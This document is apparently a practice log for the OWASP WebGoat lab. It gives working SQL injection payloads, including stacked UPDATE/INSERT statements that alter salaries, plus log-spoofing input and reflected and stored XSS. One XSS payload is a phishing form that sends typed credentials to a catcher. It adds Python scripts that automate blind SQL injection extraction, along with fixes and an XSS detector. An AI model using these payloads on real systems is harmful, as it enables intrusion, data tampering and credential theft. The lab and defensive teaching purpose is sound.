# 2020.07.16 Hands-on practice

#### Install Java
https://java.com/zh_TW/download/manual.jsp

#### Set the environment variable
Add the JRE `bin` directory to `PATH`:
C:\Program Files\Java\jre1.8.0_261\bin

#### Download WebGoat
https://owasp.org/www-project-webgoat/
https://github.com/WebGoat/WebGoat/releases?after=v8.0.0.M4

#### Start WebGoat
Put the jar in C:/WebGoat and run:
```
java -jar C:/WebGoat/webgoat-container-7.1-exec.jar
```
Then open http://localhost:8080/WebGoat/ and log in as guest/guest.

### Exercise 1
Injection Flaws > Numeric SQL Injection

Intercept the POST and change the `station` parameter so the WHERE clause is always true:
```
&station=102 or 1=1
```

### Exercise 2
Injection Flaws > String SQL Injection

Close the quoted string and append a condition that is always true:
```
Smith' or '1'='1
```

### Exercise 3
Hint: the `salaries` table. The lesson's backend runs several statements from one input, so the string injection can be extended with a second statement and finished with a SELECT whose closing quote is supplied by the application.

[Update]
```
Smith' ; Update salaries set salary = 1000000 where userid = 'jsmith';SELECT * from salaries where '1' = '1
```
[Insert]
```
Smith' ; Insert Into salaries (userid,salary) values ('hello', 200);SELECT * from salaries where '1' = '1
```
Statements that can be chained this way: Insert, Update, Delete, Alter.

#### Extra 1
Log Spoofing

Submit a username that contains a line break; the text after the break is written to the log as if it were a separate entry:
```
123
Login succeed for username: admin
```

#### Extra 2
Blind Numeric SQL Injection

The page only reports whether the account number is valid. Appending a condition on the PIN turns that answer into a true/false oracle; changing the comparison value narrows the PIN down:
```
101 AND ( ( SELECT pin FROM pins WHERE cc_number=1111222233334444 ) >1000 )
```

#### Extra 3
Blind String SQL Injection

Same idea, one character of the name at a time:
```
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );
```

### Exercise 4
XSS > Phishing with XSS (Reflected XSS)

The search field reflects its input unencoded:
```
<script>alert('hacked')</script>
```

### Exercise 5
XSS > Stored XSS Attacks
```
<script>alert('hacked')</script>
```

### Exercise 6
XSS > Phishing with XSS (Reflected XSS)

Built up in steps. First, a bare login form injected into the page:
```
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
```
With a logo so it looks legitimate:
```
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
<img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google">
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
```
With the script that sends the entered credentials to WebGoat's catcher. The form needs `name="loginform"` so that `document.loginform` resolves:
```
<form name="loginform">
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
<img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google">
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<script>
function hack() {
  var username = document.loginform.user.value;
  var password = document.loginform.pass.value;
  alert("Your credentials were just stolen.\nUser:" + username + "\nPassword=" + password);
  // Exfiltrate via an image request; the browser sends it without any user action.
  XSSImage = new Image;
  XSSImage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + username + "&password=" + password;
}
</script>
```
A stripped-down variant that only pops an alert, to confirm the `onclick` handler fires before wiring up the catcher:
```
<form name="loginform">
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
<img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google">
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<script>
function hack() {
  var username = document.loginform.user.value;
  var password = document.loginform.pass.value;
  alert("hack");
}
</script>
```
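The three SQL injection exercises above (numeric, string, and the stacked Update/Insert) reproduced offline, as an added example that is not WebGoat's code. It builds a constructed in-memory SQLite copy of the lesson-style tables (`weather_data`, `user_data`, `salaries`; the rows are made up here), runs each payload through the concatenation pattern the lessons exploit, and shows the bound-parameter fix beside it. The function and table names are this example's own assumptions:

```python
import sqlite3

# Constructed sample rows standing in for WebGoat's weather_data, user_data
# and salaries tables (the real lesson data differs).
WEATHER = [(101, "Columbia"), (102, "Seattle"), (103, "New York")]
USERS = [("jsmith", "John", "Smith"), ("jdoe", "Jane", "Doe"), ("bjones", "Bob", "Jones")]
SALARIES = [("jsmith", 50000), ("jdoe", 61000), ("bjones", 45000)]


def new_db():
    """Fresh in-memory database with the three lesson-style tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE weather_data (station INTEGER, city TEXT);"
        "CREATE TABLE user_data (userid TEXT, first_name TEXT, last_name TEXT);"
        "CREATE TABLE salaries (userid TEXT, salary INTEGER);"
    )
    db.executemany("INSERT INTO weather_data VALUES (?, ?)", WEATHER)
    db.executemany("INSERT INTO user_data VALUES (?, ?, ?)", USERS)
    db.executemany("INSERT INTO salaries VALUES (?, ?)", SALARIES)
    return db


# --- Exercise 1: numeric injection ------------------------------------------
def station_vuln(db, station):
    """The lesson's bug: the station parameter is pasted straight into the SQL,
    so "102 or 1=1" turns the WHERE clause into a tautology."""
    sql = "SELECT station, city FROM weather_data WHERE station = " + station
    return db.execute(sql).fetchall()


def station_safe(db, station):
    """Fix: validate the type, then bind the value as a parameter."""
    station_id = int(station)  # "102 or 1=1" raises ValueError here
    return db.execute(
        "SELECT station, city FROM weather_data WHERE station = ?", (station_id,)
    ).fetchall()


# --- Exercises 2 and 3: string injection and stacked statements --------------
def user_vuln(db, last_name):
    """The lesson's bug: the quoted name is pasted into the WHERE clause."""
    sql = ("SELECT userid, first_name, last_name FROM user_data "
           "WHERE last_name = '" + last_name + "'")
    return db.execute(sql).fetchall()


def user_vuln_stacked(db, last_name):
    """Same concatenation, but the driver is allowed to run several statements,
    as the lesson's backend did.  sqlite3's execute() refuses stacked
    statements, so executescript() is used; it returns no rows, so callers
    re-query salaries afterwards to see what the injected UPDATE/INSERT did."""
    sql = ("SELECT userid, first_name, last_name FROM user_data "
           "WHERE last_name = '" + last_name + "'")
    db.executescript(sql)


def user_safe(db, last_name):
    """Fix: bound parameter; the whole payload is matched literally as a name."""
    return db.execute(
        "SELECT userid, first_name, last_name FROM user_data WHERE last_name = ?",
        (last_name,),
    ).fetchall()


def salary_of(db, userid):
    row = db.execute("SELECT salary FROM salaries WHERE userid = ?", (userid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = new_db()
    print(station_vuln(db, "102 or 1=1"))      # every station, not just 102
    print(user_vuln(db, "Smith' or '1'='1"))   # every user
    print(user_safe(db, "Smith' or '1'='1"))   # [] : nobody has that last name
    user_vuln_stacked(db, "Smith' ; Update salaries set salary = 1000000 "
                          "where userid = 'jsmith';SELECT * from salaries where '1' = '1")
    print(salary_of(db, "jsmith"))             # 1000000
```

The `int()` check in `station_safe` is what makes the numeric lesson unexploitable even before the query runs; the string cases need the bound parameter, because any quoting scheme applied by hand is what the lesson's `'` payload is designed to escape.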
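Extras 2 and 3 (blind numeric and blind string SQL injection) carried through to a full extraction, as an added example that is not WebGoat's code. The oracle is the lesson's: the page answers only "account valid / not valid", and the account number is concatenated into the query. The `pins` rows, PIN and names below are constructed for this example; `account_exists`, `recover_pin` and `recover_name` are this example's own names. It goes beyond the single guesses on the page by binary-searching the PIN and every character of the name automatically:

```python
import sqlite3

# Constructed data standing in for the lesson's pins and user_data tables.
# The PIN and names are values chosen for this example, not WebGoat's.
PINS = [(1111222233334444, 2364, "Jill"), (4321432143214321, 7177, "Joe")]


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE pins (cc_number INTEGER, pin INTEGER, name TEXT);"
        "CREATE TABLE user_data (userid INTEGER, last_name TEXT);"
    )
    db.executemany("INSERT INTO pins VALUES (?, ?, ?)", PINS)
    db.execute("INSERT INTO user_data VALUES (101, 'Smith')")
    return db


def account_exists(db, account_number):
    """The lesson's oracle: the page only says whether the account is valid,
    and the account number is concatenated into the query.  Any boolean
    condition appended after AND therefore leaks one bit per request."""
    sql = "SELECT * FROM user_data WHERE userid = " + account_number
    return db.execute(sql).fetchone() is not None


def recover_pin(db, cc_number, lo=0, hi=9999):
    """Extra 2: binary-search the PIN with 'pin > N' questions.
    Returns (pin, number_of_requests)."""
    requests = 0
    while lo < hi:
        mid = (lo + hi) // 2
        payload = f"101 AND ((SELECT pin FROM pins WHERE cc_number={cc_number}) > {mid})"
        requests += 1
        if account_exists(db, payload):
            lo = mid + 1          # PIN is above mid
        else:
            hi = mid              # PIN is mid or below
    return lo, requests


def recover_name(db, cc_number, max_len=32):
    """Extra 3: recover the name one character at a time.  Each position is
    binary-searched over printable ASCII with 'SUBSTR(name, pos, 1) < ch'.
    SQLite spells it SUBSTR; the lesson's payload used SUBSTRING."""
    name = ""
    for pos in range(1, max_len + 1):
        longer = f"101 AND (LENGTH((SELECT name FROM pins WHERE cc_number='{cc_number}')) >= {pos})"
        if not account_exists(db, longer):
            break                  # ran off the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = chr(mid + 1).replace("'", "''")   # keep the SQL literal well-formed
            payload = (f"101 AND (SUBSTR((SELECT name FROM pins WHERE "
                       f"cc_number='{cc_number}'), {pos}, 1) < '{probe}')")
            if account_exists(db, payload):
                hi = mid           # character code <= mid
            else:
                lo = mid + 1
        name += chr(lo)
    return name


if __name__ == "__main__":
    db = new_db()
    print(recover_pin(db, 1111222233334444))   # (2364, <= 14 requests)
    print(recover_name(db, 4321432143214321))  # Joe
```

Each request answers one yes/no question, so a four-digit PIN costs at most 14 requests and each character of the name at most 7; rate limiting alone does not stop this, only removing the concatenation does.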
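Exercises 4 to 6 (reflected and stored XSS, and the phishing form) seen from the application side, as an added example that is not WebGoat's code. It renders a message the lesson's way (raw interpolation) and the fixed way (`html.escape`), and adds a small parser that lists the constructs a browser would execute in a fragment: `<script>` elements, `on*` handlers and `javascript:` URLs. The page template, the trimmed copy of the phishing form and the helper names are this example's own assumptions:

```python
import html
from html.parser import HTMLParser

# Constructed payloads: the lesson's alert probe, and a trimmed copy of the
# Exercise 6 phishing form, whose handler posts the victim's credentials to
# WebGoat's catcher.
ALERT = "<script>alert('hacked')</script>"
PHISHING = """<form name="loginform">
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<script>function hack(){ new Image().src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="
 + document.loginform.user.value + "&password=" + document.loginform.pass.value; }</script>"""

# Hypothetical page template for the message board / search result.
PAGE = '<html><body><h2>Message</h2><div class="msg">{body}</div></body></html>'


def render_unsafe(message):
    """The lesson's bug: user text is interpolated into the page as markup."""
    return PAGE.format(body=message)


def render_safe(message):
    """Fix: HTML-encode the text so the browser displays it instead of parsing it."""
    return PAGE.format(body=html.escape(message, quote=True))


class ActiveContentFinder(HTMLParser):
    """Records constructs a browser would execute: <script> elements,
    on* event-handler attributes, and javascript: URLs in href/src/action."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script-tag", tag))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))
            elif (name in ("href", "src", "action") and value
                  and value.strip().lower().startswith("javascript:")):
                self.findings.append(("javascript-url", f"{tag}@{name}"))


def active_content(fragment):
    """Return every executable construct found in an HTML fragment."""
    parser = ActiveContentFinder()
    parser.feed(fragment)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    print(active_content(render_unsafe(ALERT)))   # [('script-tag', 'script')]
    print(active_content(render_safe(ALERT)))     # []
    print(active_content(PHISHING))               # script tag + input@onclick
```

Output encoding at render time is the fix; a detector like `active_content` is only a sanity check for stored content, since it recognises the patterns on this page and not every way a browser can be made to run script.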
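Extra 1 (log spoofing) reproduced with a weak and a hardened log writer, as an added example that is not WebGoat's code. The username value is the page's payload with its line break; the logger and reviewer functions are this example's own names. The hardened version escapes every control character rather than only the newline, so one call always produces exactly one log line:

```python
import re

# Constructed input: the lesson's payload, a username whose value carries an
# embedded line break followed by a forged log entry.
SPOOF = "123\nLogin succeed for username: admin"

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def log_login_unsafe(log, username, success):
    """The lesson's bug: the username goes into the entry as-is, so a CR/LF
    inside it starts a new line that reads as a separate event."""
    status = "succeed" if success else "failed"
    log.append(f"Login {status} for username: {username}")


def log_login_safe(log, username, success):
    """Fix: escape every control character (not only \\n) before logging, so a
    call yields exactly one line and terminal escape sequences are neutralised."""
    status = "succeed" if success else "failed"
    clean = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), username)
    log.append(f"Login {status} for username: {clean}")


def successful_logins(log):
    """What a reviewer or a detection rule sees once the log is written out
    line by line: the usernames on lines claiming a successful login."""
    text = "\n".join(log)
    return [line.split("username: ", 1)[1]
            for line in text.splitlines()
            if line.startswith("Login succeed for username: ")]


if __name__ == "__main__":
    unsafe, safe = [], []
    log_login_unsafe(unsafe, SPOOF, success=False)
    log_login_safe(safe, SPOOF, success=False)
    print(successful_logins(unsafe))  # ['admin']  <- forged entry
    print(successful_logins(safe))    # []
```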